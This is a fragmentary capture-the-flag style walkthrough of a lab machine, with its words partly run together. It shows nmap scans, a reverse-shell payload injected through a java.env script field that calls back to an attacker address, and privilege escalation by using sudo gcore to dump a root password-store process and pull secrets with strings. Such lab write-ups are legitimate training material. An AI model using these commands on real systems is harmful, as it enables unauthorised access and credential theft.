nmapAutomator.sh -H 192.168.237.98 -t full
nmapAutomator.sh -H 192.168.237.98 -t vulns
java.env scriptfield can be used to execute arbitrary commands. For instance, we can trigger a reverse shell with
$(bash -i >& /dev/tcp/192.168.49.237/4242 0>&1)
rootruns a binary
/usr/bin/password-store. We don't have permissions to run this, but it looks interesting.
gcoreas root with no password.
gcorecreates a core dump of a running process. A core file or core dump is a file that records the memory image of a running process and its process status.
ps -ef | grep password-store, we find that the process ID is 493. Then, we can run
sudoto create a core dump of the process.
strings core.493), we find something interesting.